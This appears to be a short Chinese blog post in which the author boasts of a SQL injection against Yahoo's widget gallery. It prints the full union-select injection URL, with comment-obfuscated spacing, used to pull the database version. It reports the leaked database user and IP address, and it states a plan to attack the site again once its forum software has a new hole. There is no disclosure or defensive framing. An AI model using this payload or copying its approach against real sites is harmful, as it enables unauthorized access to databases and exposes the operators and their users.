找到一个 Yahoo 主入漏洞,真JB兴奋.
[code]
http://widgets.yahoo.com/gallery/view.php?widget=39352/**/and/**/1=2/**/union/**/select/**/version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15
[/code]
居然yahoo也是用mysql数据库。4.0
user :gallery@68.142.196.85
第2天早上看.漏洞就给修补了。日…..
找一个下。yahoo 用的是 Invision Power Board v2.1.7 [IPB 论坛 ]的开源程序。
等出漏洞,再去日.靠。
没有评论:
发表评论